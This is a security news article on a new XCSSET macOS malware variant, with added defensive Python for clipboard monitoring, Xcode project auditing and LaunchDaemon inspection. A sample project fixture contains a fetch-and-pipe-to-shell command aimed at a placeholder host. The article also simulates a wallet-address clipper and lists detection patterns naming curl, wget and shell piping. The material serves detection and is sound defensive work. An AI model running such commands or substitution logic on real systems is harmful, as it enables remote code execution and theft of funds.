Emerging XCSSET Variant Expands the macOS Threat Landscape with Advanced Tactics

Cybersecurity experts have identified a new iteration of the XCSSET malware, a sophisticated threat targeting macOS systems. This variant introduces new techniques for browser data theft, clipboard manipulation, and persistence, posing significant risks to developers and end users alike.

Background on XCSSET

First documented in August 2020, XCSSET is a modular malware known for infecting Xcode projects. By embedding malicious code into these projects, the malware activates during the build process, compromising developers’ systems. The exact distribution method remains unclear, but it’s believed that the malware spreads through shared Xcode project files among developers.

Recent Developments

In March 2025, Microsoft reported enhancements to XCSSET, including improved error handling and multiple persistence techniques, all in service of the malware's goal of extracting sensitive data from infected systems. The latest variant builds on those features, introducing more refined methods to evade detection and maintain control over compromised devices.

Key Features of the New Variant

1. Clipboard Hijacking (Clipper Module): The malware now includes a clipper module that monitors clipboard content for cryptocurrency wallet addresses. When such an address is detected, the malware replaces it with one controlled by the attacker, redirecting funds during transactions.

2. Enhanced Browser Targeting: The malware has extended its data theft to Mozilla Firefox. It employs a modified build of HackBrowserData, a publicly available open-source tool for dumping saved browser credentials and other stored data, to harvest sensitive information from Firefox profiles.

3. Advanced Persistence Mechanisms: Beyond previous methods, the malware now establishes persistence through LaunchDaemon entries, so it is relaunched on every boot. Because LaunchDaemons are started by launchd as root before any user logs in, they are a stronger foothold than per-user LaunchAgents; installing one under /Library/LaunchDaemons requires administrator privileges.

4. Sophisticated Obfuscation Techniques: The malware uses run-only compiled AppleScripts and advanced encryption methods to conceal its activities. A run-only script is compiled without its source, so it cannot be recovered with osadecompile, which pushes analysts toward dynamic analysis and makes static detection harder.
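The clipper behaviour described in item 1, as an added example that is not code from the page or from the malware analysis it summarises: `clipper_rewrite` simulates what such a module does to clipboard text (swap any recognised wallet address for an attacker-controlled one of the same format), and `is_substitution` is a simple tripwire a user can run against `pbpaste` to notice it. The address formats, attacker addresses, and sample clipboard text are all constructed for the example; the regexes are format heuristics, not checksum validation.

```python
import re
import subprocess
import time

# Format heuristics for common wallet address types (no checksum validation).
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc-bech32": re.compile(r"\bbc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{38,59}\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}

# Constructed attacker-controlled addresses for the simulation (not real IoCs).
ATTACKER_ADDRESSES = {
    "btc-legacy": "1AttackerAttackerAttackerAttacker",
    "btc-bech32": "bc1q" + "attacker" * 4 + "attack",
    "eth": "0x" + "dead" * 10,
}

# Constructed victim address (the BIP173 example address) and clipboard text.
VICTIM_BTC = "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"
SAMPLE_CLIPBOARD = "send to " + VICTIM_BTC + " please"


def classify_address(text):
    """Return the wallet format of a whole clipboard value, or None."""
    value = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.fullmatch(value):
            return kind
    return None


def clipper_rewrite(clipboard_text, attacker_addresses):
    """Simulate the clipper: every address of a known format is replaced by the
    attacker's address of the same format; everything else passes through."""
    for kind, pattern in ADDRESS_PATTERNS.items():
        replacement = attacker_addresses.get(kind)
        if replacement:
            clipboard_text = pattern.sub(replacement, clipboard_text)
    return clipboard_text


def is_substitution(before, after):
    """Tripwire: the clipboard changed from one address to a different address
    of the same format. A clipper produces exactly this transition; so does a
    user copying two addresses in a row, so treat a hit as a prompt to verify."""
    kind_before, kind_after = classify_address(before), classify_address(after)
    return kind_before is not None and kind_before == kind_after and before.strip() != after.strip()


def read_clipboard():
    """Read the macOS clipboard via pbpaste (macOS only)."""
    return subprocess.run(["pbpaste"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Poll the clipboard and warn on an address-to-address change.
    last = read_clipboard()
    while True:
        time.sleep(0.5)
        current = read_clipboard()
        if is_substitution(last, current):
            print("WARNING: clipboard address changed from", last.strip(), "to", current.strip())
        last = current
```

The monitor only observes the clipboard, so it cannot tell a clipper's rewrite from a user copying a second address; the practical defence the page recommends still applies, which is to compare the pasted address against the source before sending.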

Infection Chain Analysis

The infection process involves multiple stages:

1. Initial Execution: When a developer builds an infected Xcode project, a shell payload executes, downloading an obfuscated shell command.

2. System Information Collection: The shell command gathers operating system details and transmits them to a command-and-control (C2) server, which responds with an additional shell script payload.

3. Payload Deployment: The shell script checks the device’s XProtect version and uses `osacompile` to build an AppleScript application bundle.

4. Final Execution: The AppleScript application runs a shell command to obtain the final-stage AppleScript, responsible for collecting system information and launching various sub-modules.
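The build-time hook in step 1, as an added example that is not code from the page or from the malware analysis: a small audit script for the `project.pbxproj` file inside an Xcode project. It assumes the payload is wired in the way shell normally runs at build time, as a Run Script build phase (`PBXShellScriptBuildPhase`), lists every such phase with its script, and flags indicators that warrant a look before the project is built. The sample pbxproj fragment and the indicator list are constructed for the example, not published XCSSET signatures.

```python
import re
import sys

# Indicators that justify reading a build-phase script before building.
# This list is the example's own heuristic, not a published XCSSET signature.
SUSPICIOUS = {
    "curl": r"\bcurl\b",
    "wget": r"\bwget\b",
    "pipe-to-shell": r"\|\s*(?:sh|bash|zsh)\b",
    "osascript": r"\bosascript\b",
    "base64-decode": r"\bbase64\b.*(?:-d|-D|--decode)",
    "eval": r"\beval\b",
    "tmp-path": r"/tmp/|/var/tmp/",
    "chmod-exec": r"\bchmod\b.*\+x",
    "nohup": r"\bnohup\b",
}

# pbxproj is an old-style plist: "ID /* comment */ = { ... };" objects.
# Build-phase objects contain no nested braces, so a non-greedy match to the
# first "};" is enough for them.
_OBJECT = re.compile(r"([0-9A-F]{8,24})\s*(?:/\*[^*]*\*/)?\s*=\s*\{(.*?)\n\s*\};", re.S)
_SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
_NAME = re.compile(r'\bname\s*=\s*"?([^";]+)"?\s*;')
_SHELL = re.compile(r'shellPath\s*=\s*"?([^";]+)"?\s*;')

# Constructed sample fragment (not from a real project): one Run Script
# phase that fetches a remote payload into sh, and one ordinary phase.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3D4 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            inputPaths = (
            );
            name = "Run Script";
            outputPaths = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -fsSL \"http://example.invalid/x\" | sh\n";
            showEnvVarsInLog = 0;
        };
/* End PBXShellScriptBuildPhase section */
/* Begin PBXSourcesBuildPhase section */
        E5F6A7B8 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
        };
/* End PBXSourcesBuildPhase section */
'''


def _unescape(value):
    """Undo pbxproj string escaping: \\n, \\t, \\" and \\\\."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), value)


def audit_pbxproj(text):
    """Return every Run Script build phase with its decoded script and indicators."""
    findings = []
    for obj_id, body in _OBJECT.findall(text):
        if not re.search(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;", body):
            continue
        script_match = _SCRIPT.search(body)
        script = _unescape(script_match.group(1)) if script_match else ""
        name = _NAME.search(body)
        shell = _SHELL.search(body)
        findings.append({
            "id": obj_id,
            "name": name.group(1) if name else "",
            "shell": shell.group(1) if shell else "/bin/sh",
            "script": script,
            "indicators": [key for key, pat in SUSPICIOUS.items() if re.search(pat, script)],
        })
    return findings


def audit_file(path):
    """Audit a project.pbxproj file on disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_pbxproj(fh.read())


if __name__ == "__main__":
    findings = audit_file(sys.argv[1]) if len(sys.argv) > 1 else audit_pbxproj(SAMPLE_PBXPROJ)
    for f in findings:
        marker = "SUSPICIOUS" if f["indicators"] else "ok"
        print(f"[{marker}] {f['id']} {f['name']!r} via {f['shell']}: {f['indicators']}")
        print("    " + f["script"].rstrip().replace("\n", "\n    "))
```

Run it as `python3 audit_pbxproj.py MyApp.xcodeproj/project.pbxproj` before the first build of anything cloned from outside the team; an empty report means no Run Script phase exists, and a flagged one should be read in full rather than trusted on the indicator alone.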

Sub-Modules and Their Functions

– vexyeqj: Formerly known as seizecj, this module downloads and executes another module called bnk using `osascript`. It includes functions for data validation, encryption, decryption, fetching additional data from the C2 server, and logging. It also incorporates the clipper functionality.

– neq_cdyd_ilvcmwx: Similar to the previous txzx_vostfdi module, it exfiltrates files to the C2 server.

– xmyyeqjx: Sets up persistence using LaunchDaemon entries.

– jey: Establishes persistence through Git-based methods.

– iewmilh_cdyd: Steals data from Firefox using a modified version of HackBrowserData.
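A check for the LaunchDaemon persistence set up by xmyyeqjx, as an added example that is not code from the page or from the malware analysis: it parses launchd property lists with Python's standard `plistlib` and flags the traits a suspicious entry tends to show (an Apple-looking label outside /System, an interpreter such as osascript as the program, an inline `-e` script argument, or a payload in a user-writable location). The two plists and their labels are constructed for the example, not real indicators, and the flags are heuristics to prioritise review, not a verdict.

```python
import glob
import os
import plistlib

# Interpreters a daemon should rarely be running directly.
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3", "perl", "ruby", "curl"}
# Locations any local user can write to; a daemon payload there is a red flag.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")

# Constructed sample: an Apple-looking label dropped in the third-party
# daemon directory, running a compiled AppleScript from a shared folder.
MALICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.syncupdate</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/osascript</string>
    <string>/Users/Shared/.update/agent.scpt</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed sample of an ordinary third-party daemon.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>Program</key><string>/Library/Application Support/Example/backupd</string>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def inspect_launchd_plist(path, data):
    """Parse one launchd plist (XML or binary) and return key facts plus heuristic flags."""
    plist = plistlib.loads(data)
    args = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program") or (args[0] if args else "")
    label = plist.get("Label", "")
    is_daemon = path.startswith("/Library/LaunchDaemons/")
    flags = []
    # Apple's own daemons live under /System; a com.apple.* label elsewhere is masquerading.
    if label.startswith("com.apple.") and not path.startswith("/System/"):
        flags.append("apple-label-outside-System")
    if os.path.basename(program) in INTERPRETERS:
        flags.append("interpreter-as-program")
    if "-e" in args:
        flags.append("inline-script-argument")
    for item in [program] + args[1:]:
        # A root daemon whose payload sits anywhere under /Users is equally suspect.
        if item.startswith(WRITABLE_PREFIXES) or (is_daemon and item.startswith("/Users/")):
            flags.append("user-writable-path:" + item)
    return {
        "path": path,
        "label": label,
        "program": program,
        "args": args,
        "run_at_load": bool(plist.get("RunAtLoad", False)),
        "keep_alive": bool(plist.get("KeepAlive", False)),
        "flags": flags,
    }


def audit_launchd_dirs(directories):
    """Inspect every plist in the given directories; unreadable files are reported as a flag."""
    results = []
    for directory in directories:
        for path in glob.glob(os.path.join(directory, "*.plist")):
            try:
                with open(path, "rb") as fh:
                    results.append(inspect_launchd_plist(path, fh.read()))
            except Exception as exc:  # malformed plist, permissions, etc.
                results.append({"path": path, "label": "", "program": "", "args": [],
                                "run_at_load": False, "keep_alive": False,
                                "flags": ["unreadable:" + str(exc)]})
    return results


if __name__ == "__main__":
    dirs = ["/Library/LaunchDaemons", "/Library/LaunchAgents", os.path.expanduser("~/Library/LaunchAgents")]
    for entry in audit_launchd_dirs(dirs):
        if entry["flags"]:
            print(entry["path"], entry["label"], entry["program"], entry["flags"])
```

Cross-check anything flagged against `launchctl print system` (or `launchctl print gui/$UID` for agents), which shows what launchd has actually loaded; a plist on disk that launchd does not list, or a loaded job with no plist on disk, is itself worth explaining.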

Implications for macOS Users

The evolution of XCSSET underscores the increasing sophistication of threats targeting macOS systems. The malware’s ability to hijack clipboard data, harvest data from popular browsers, and maintain persistence through advanced methods highlights the need for heightened vigilance among developers and users.

Recommendations for Mitigation

– Regular System Updates: Ensure that macOS and all installed applications are up-to-date to benefit from the latest security patches.

– Cautious Project Handling: Thoroughly inspect and verify any Xcode projects downloaded or cloned from repositories before use.

– Clipboard Awareness: Be cautious when copying and pasting sensitive information, especially cryptocurrency wallet addresses.

– Trusted Sources: Only install applications from reputable sources, such as the official Mac App Store.

Conclusion

The latest XCSSET variant represents a significant advancement in macOS malware, employing sophisticated techniques to compromise systems and exfiltrate sensitive data. By staying informed and adopting proactive security measures, users can mitigate the risks associated with this evolving threat.